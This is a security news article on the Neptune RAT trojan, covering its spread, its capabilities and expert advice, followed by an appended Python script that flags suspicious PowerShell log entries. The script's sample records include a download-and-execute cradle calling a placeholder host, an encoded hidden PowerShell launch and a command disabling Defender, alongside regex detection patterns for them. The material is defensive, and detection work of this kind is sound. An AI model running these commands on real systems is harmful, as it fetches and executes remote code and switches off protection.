Neptune RAT spreads across GitHub, Telegram, and YouTube – Go Health Pro

A new version of Neptune RAT written in Visual Basic.NET is spreading rapidly across many platforms, most notably GitHub, Telegram, and YouTube.

CYFIRMA researchers said the creator of the remote access trojan (RAT) made the software available without the source code, intentionally obfuscating the executable files to make analysis more challenging.

According to an April 7 post, Neptune RAT has many dangerous features, including a ransomware capability, a crypto clipper, a password grabber, live desktop monitoring, and the ability to disable antivirus software. It can also exfiltrate the credentials of more than 270 applications.

Satish Swargam, principal security consultant at Black Duck, said some of Neptune RAT's exploits include deploying ransomware that encrypts files and demands payment, bringing businesses to a halt until the issue has been addressed.

Swargam said Neptune RAT exemplifies the notion that software risk equates to business risk. And it comes with widespread consequences, as victims' screens can be monitored in real time and the RAT can replace clipboard content with the attacker's cryptocurrency wallet addresses.

"This malware continues to evolve with new exploits since the techniques are available on GitHub initially meant to be for educational purposes by the Freemasonry Group," said Swargam. "Continuous monitoring, robust endpoint protection, and proactive threat detection strategies are crucial to mitigating the impact of this trojan."

Darren Guccione, co-founder and CEO at Keeper Security, said the resurgence and rebranding of Neptune RAT highlights how accessible and damaging RATs have become in the wrong hands. Marketed as "educational," Guccione said this malware is anything but harmless.

"It can steal credentials from hundreds of applications, hijack crypto transactions, deploy ransomware and even destroy systems – often without detection," said Guccione. "The fact that it's spreading through mainstream platforms like GitHub, YouTube and Telegram is particularly concerning. This serves as a stark reminder for users to be vigilant, use strong and unique passwords stored in a secure password manager, enable MFA everywhere possible and avoid downloading unknown tools or scripts online."

Lawrence Pingree, vice president at Dispersive, explained that Neptune RAT uses living-off-the-land (LOTL) attacks tied to PowerShell. Pingree said security teams can use endpoint detection and response (EDR) tools to detect the use of PowerShell commands, but the results must be reviewed by a human in most cases.

"Ideally, segmenting and microsegmenting an environment can help reduce the potential lateral movement of an attacker," said Pingree.
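The detection-plus-human-review approach Pingree describes, as an added example that is not part of the article or of CYFIRMA's research: a small triage routine that scores PowerShell script-block log entries for generic living-off-the-land indicators (encoded commands, hidden windows, policy bypass, download cradles, Defender tampering) and queues anything above a threshold for an analyst. The log records and the indicator patterns are constructed for illustration and are not Neptune RAT signatures.

```python
import re

# Constructed sample records shaped loosely like Windows PowerShell
# Operational log event 4104 (ScriptBlockText). Invented for this example.
SAMPLE_EVENTS = [
    {"id": 1, "user": "CORP\\admin", "script": "Get-Service -Name Spooler"},
    {"id": 2, "user": "CORP\\jdoe",
     "script": "powershell -w hidden -nop -ep bypass -enc SQBFAFgA..."},
    {"id": 3, "user": "CORP\\jdoe",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
    {"id": 4, "user": "CORP\\svc",
     "script": "Set-MpPreference -DisableRealtimeMonitoring $true"},
]

# Generic LOTL indicators (assumed, not taken from any vendor signature set).
# Each maps to a compiled pattern and a weight; weights are a tuning choice.
INDICATORS = {
    # -e, -ec, -enc, -EncodedCommand (but not -ep / -ExecutionPolicy)
    "encoded_command": (re.compile(r"(?i)\s-e(?:c|nc|ncodedcommand)?\b"), 2),
    "hidden_window":   (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 1),
    "bypass_policy":   (re.compile(r"(?i)-e(?:xecution)?p(?:olicy)?\s+bypass"), 1),
    "download_cradle": (re.compile(
        r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression"), 2),
    # Ties to the article's "disable antivirus software" capability.
    "av_tamper":       (re.compile(r"(?i)Set-MpPreference.*-Disable"), 3),
}


def score_script(script):
    """Return (total_score, [indicator names]) for one script block."""
    hits = [name for name, (pattern, _) in INDICATORS.items() if pattern.search(script)]
    score = sum(INDICATORS[name][1] for name in hits)
    return score, hits


def triage(events, threshold=2):
    """Return events at or above the threshold, annotated for analyst review.

    The automated step only ranks; the 'needs_review' flag records that a
    human still decides, as the article's quoted guidance requires.
    """
    flagged = []
    for event in events:
        score, hits = score_script(event["script"])
        if score >= threshold:
            flagged.append({**event, "score": score, "hits": hits, "needs_review": True})
    return flagged


if __name__ == "__main__":
    for item in triage(SAMPLE_EVENTS):
        print(item["id"], item["user"], item["score"], ", ".join(item["hits"]))
```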
